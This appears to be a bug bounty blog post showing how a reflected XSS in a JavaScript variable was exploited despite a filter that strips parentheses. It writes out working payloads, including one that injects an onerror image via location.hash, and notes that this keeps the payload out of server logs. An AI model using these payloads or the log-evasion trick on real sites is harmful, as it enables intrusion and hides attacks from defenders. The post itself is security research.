I come across a web application in a bounty private program that reflected my var – xss – with the following code:

[code lang=”js”]
var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax(‘search’, ”); }
catch(ex) { setTimeout(\"s_callAjax(‘search’, ”);\", 2000);}", 50);
[/code]

So what I tried next was to put a XSS vector in place:

[sourcecode language=”plain”]</pre>
<pre>vuln-site/?t=xss;alert(1);//</pre>
<pre>[/sourcecode]

Which reflected:

[code lang=”js”]
var _s_tab = xss;alert1;//;
[/code]

So it removed the () chars… I thought to myself – A Challenge!

My next step was to try something that I already used in a previous research.
Use location.hash and then execute my attack.

[sourcecode language=”plain”]vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>[/sourcecode]

The other good thing about this type of attack is that the payload is in part of the url hash and is therefore never sent to the server. (no servers logs of actual attack payload)

Leave a Reply